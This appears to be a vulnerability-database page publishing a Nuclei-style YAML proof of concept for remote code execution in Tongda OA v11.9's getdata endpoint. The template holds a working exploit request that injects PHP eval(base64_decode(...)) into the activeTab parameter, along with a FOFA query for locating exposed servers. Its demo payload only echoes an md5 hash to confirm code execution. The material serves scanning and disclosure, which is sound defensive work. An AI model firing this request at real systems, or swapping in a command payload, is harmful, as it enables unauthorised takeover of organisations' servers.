tongda-getdata-rce: Tongda OA v11.9 getadata - Remote Code Execution

2025-08-01 Tongda OA PoC Public

Description

There is an arbitrary command execution vulnerability in the getdata interface of Tongda OA v11.9. An attacker can execute arbitrary commands on the server to control server permissions through the vulnerability.

PoC

id: tongda-getdata-rce

info:
  name: Tongda OA v11.9 getadata - Remote Code Execution
  author: SleepingBag945
  severity: critical
  description: |
    There is an arbitrary command execution vulnerability in the getdata interface of Tongda OA v11.9. An attacker can execute arbitrary commands on the server to control server permissions through the vulnerability.
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.9%20getdata%20%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
  classification:
    cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:*
    cwe-id: CWE-78,CWE-95
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="TDXK-通达OA"
    product: office_anywhere
    vendor: tongda2000
  tags: tongda,rce,vuln

variables:
  num: '999999999'
  payload: "echo md5({{num}});"

http:
  - method: GET
    path:
      - "{{BaseURL}}/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22{{base64(payload)}}%22)))%3B/*&id=19&module=Carouselimage"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{{md5(num)}}'
          - 'pagelimit'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c15a5d0a00725b131bab1cc479481578cf3c7c10e1b7687065b89cf117b9e9a8022055417f989b2b17c15b6640c61444ba613c2a30f8fbb8be16f27205ca9a42e886:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities